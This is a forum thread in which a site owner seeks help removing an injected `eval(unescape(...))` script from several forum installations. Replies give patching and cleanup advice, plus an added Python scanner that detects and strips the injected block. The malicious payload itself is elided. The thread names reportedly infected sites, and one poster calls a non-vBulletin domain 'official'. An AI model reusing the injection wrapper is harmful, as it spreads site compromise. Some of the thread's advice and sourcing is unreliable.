MY Forum is infected ??? I have been battling what someone said is cross domain malicious Virus code. It seems to infect the listed files index.php login.php showthread.php

PHP:
<script>eval( unescape( "..." ));</script><?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.1

This above is listed in the index.php login.php showthread.php. How do I secure my forums?
Update your forum software to the latest version. There was a recent update to VB just a couple of weeks ago. Ask your host to update the operating system, apache, mysql, cpanel, and php to the latest versions. Read through the vbulletin security suggestions at VBulletin.com. Change the Root, MYSQL and forum admin passwords to something complex. The files that are being written to, make sure they are chmod 644. Whatever modifications you have installed, check them for security updates or bulletins - or remove them. I suggest that you only download modifications from vbulletin.org. A lot of the modifications on that site are reviewed by the core VB developers.
The latest version of VB is 3.8.1 Patch Level 1. The patch was released on March 5, 2009 and fixes an XSS flaw. vbulletin.com/forum/showthread.php?t=301882 The patch deals with an XSS flaw, just like the kind that the attacker is supposed to have used on the site. So updating the site might help fix the issue.
I guess that answers the question everybody is asking - which forum software to use. All those weirdos who recommend VB as "secure" obviously don't know what they're talking about. Man, quit spending money on overpriced, underperforming, buggy and full of security issues script like VB. Not worth it.
That is not a fair statement. Especially when the source of the breach is not known. This security breach could have come from almost anything, including a misconfigured server, out of date modifications, weak passwords, brute force attacks, outdated server software... Instead of pointing the finger at VB, let's try to help the guy figure out "where" the problem is. And if he can not get it fixed, he can submit a trouble ticket to the VBulletin support team.
What are you on about... the OP has not updated to the latest version/patch so therefore how can vbulletin be blamed? Also, vbulletin support is the best offered by any forum development company so I feel that your comments are unfounded. Let's help the OP sort the problem rather than hijacking this into "the best forum software" kind of thread....
Thank ... for finding the code.... Russian bastards ... have nothing better to do .. these FAKING CACK SUCKER...... How do I remove ... the code.... it is cross site ... so WP, Joomla all have it .... how to remove????
Thank ... you are right... I have 6 forums and had wished of another method.... I found this link.... http://www.vbteam.info/vb-3-8-x-releases/
That is a thread from the official VBulletin support forums. Copy the url and paste it into your browser address bar. Here is an excerpt from that VBulletin support page.
baonhi41 ... I have spent hours and hours reading and reading steps from the link to find the "detail" steps to remove this XSS code
There are 2 possibilities:
- Server is infected. Contact the root server admin or resolve it yourself.
- Your computer is infected. In this case, all files .htm, html, php, asp,... will have that iframe code inserted. First you must be sure that your PC is clean of viruses, by scanning the PC with AV or reinstalling Windows. If not, the iframe code will be re-inserted. Download your code from the server and use Advanced Find And Replace to search for and edit out that iframe code. Upload and overwrite onto the server.
You can contact me Y!M xibamvailolz to discuss
Your suggestion
1.) Server is infected ... - My action was to contact "Host" = hostmonster and they said it is my problem .... I should fix it or be banned "web sites shutdown".... so I am very worried trying to fix this issue.
2.) Your computer is infected. - Have run two virus scanners (Avira & Malwarebytes' Anti-Malware), both show "clean".... Other computer (2nd) laptop shows site listed below has code in the header "XSS" ++
3.) I clear cache and cookies with my browser FF3 and IE7.... site below shows the same on both computers.
Listed below is one of 89 sites... my nightmare.... and the last 15 hours trying to find a solution. I have been testing to see and find a fix to remove "XSS" CODE
XSS ME - firefox addin
Acunetix Web Vulnerability Scanner.... http://www.acunetix.com/vulnerability-scanner/
Infected website.... http://www.hurtpartner.com
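The find-and-replace cleanup suggested above can be scripted. This is an added example, not code from any poster in the thread: a Python scanner for the `<script>eval( unescape( "%..." ));</script>` wrapper quoted in the first post. It decodes each hit for review without running it and can strip the block while keeping a backup. The function names, the `.infected` backup suffix and the sample file are assumptions made for the illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Wrapper shape quoted in the thread: percent-encoded bytes (with a few raw '&')
# passed to eval(unescape("...")) inside a <script> tag placed before <?php.
INJECTED = re.compile(
    r'<script[^>]*>\s*eval\(\s*unescape\(\s*"((?:%[0-9a-fA-F]{2}|&)+)"'
    r'\s*\)\s*\)\s*;?\s*</script>',
    re.IGNORECASE,
)

def find_injections(text):
    """Decode every injected payload to plain text for review; nothing is executed."""
    return [unquote(m.group(1)) for m in INJECTED.finditer(text)]

def strip_injections(text):
    """Return (cleaned_text, number_of_blocks_removed)."""
    return INJECTED.subn("", text)

def scan_tree(root, exts=(".php", ".htm", ".html", ".asp", ".js"), fix=False):
    """Map each infected file under root to its decoded payloads; optionally clean it."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        raw = path.read_bytes()
        text = raw.decode("latin-1")            # byte-exact round trip
        cleaned, count = strip_injections(text)
        if count:
            report[str(path)] = find_injections(text)
            if fix:
                # Keep the infected original as evidence before overwriting.
                path.with_name(path.name + ".infected").write_bytes(raw)
                path.write_bytes(cleaned.encode("latin-1"))
    return report

def encode_sample(js):
    """Percent-encode every byte, the way the injected block is encoded."""
    return "".join("%%%02x" % b for b in js.encode())

# Constructed sample: a harmless statement wrapped like the injected block.
SAMPLE_JS = "var constructed_marker=true;"
SAMPLE_FILE = ('<script>eval( unescape( "' + encode_sample(SAMPLE_JS)
               + '" ));</script><?php\necho "forum index";\n')

if __name__ == "__main__":
    print(find_injections(SAMPLE_FILE))
    print(strip_injections(SAMPLE_FILE))
```

Stripping the block only cleans the files; as the posts above note, the code comes back until the way it is being written (infected PC, stolen credentials, or a server-side hole) is closed.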
If the hosting provider will not do a security check, it's time to find someone else. That site you linked to is not running vbulletin, it's PHPBB. My first suggestion is to get rid of PHPBB and move over to MYBB. PHPBB has a history rich in security problems. Over the past few years I have seen communities destroyed by hackers, and it looks like yours is no different. Remove PHPBB from the server, delete the account it's been installed under, create a new user account and install MYBB under that new account. But first, find yourself a new host.
KEY~~~ this site listed was one of many sites with the same issue. I would like to say how much I respect your advice ... however I have concerns....
1.) The recommendation to first have to change software "forum" for this site because of this XSS issue. I am sure if as a last recommendation to delete the forum software it may resolve my issue .... however the suggestion seems like a temporary fix and an extremely aggressive step .... I maybe also agree with what you have said about phpbb3 ... as I too have read a lot about the software problems. BUT .... to change the software will not fix my XSS issue on my 98 sites. Example of another FORUM SITE using SMF .... http://www.forexforumtoronto.com/ I have spent hours replacing my PHP files at the SMF site above so the code "XSS" may not show up for another few hours ... injected again ....
2.) The first example of the XSS was a forum with the software PHPBB3. The other 4 forums are VB; I could give you a link URL for the VB sites... however I have spent hours replacing some files and updating versions, so I am waiting to test to see if it works ... ~~Most of all again "again" this will fix 4 forums that are VB .... vBulletin 3.8.1 Patch level 1 ( misc.php and /includes ) The SCOPE of my problem may not be just one site or software ... I am trying to understand and tackle (remove) the script XSS.... I have changed passwords (many times). I have passworded many folders SUBdomains on the server.
3.) OTHER SITES - basic site with the code .... http://gizbuilder.com/ --> </style> <script>eval( unescape( "%6 PHP:
THANKS FOR THE ADVICE ON the hosting company ... I may at sometime consider in the future...... however I am trying one problem at a time " new host"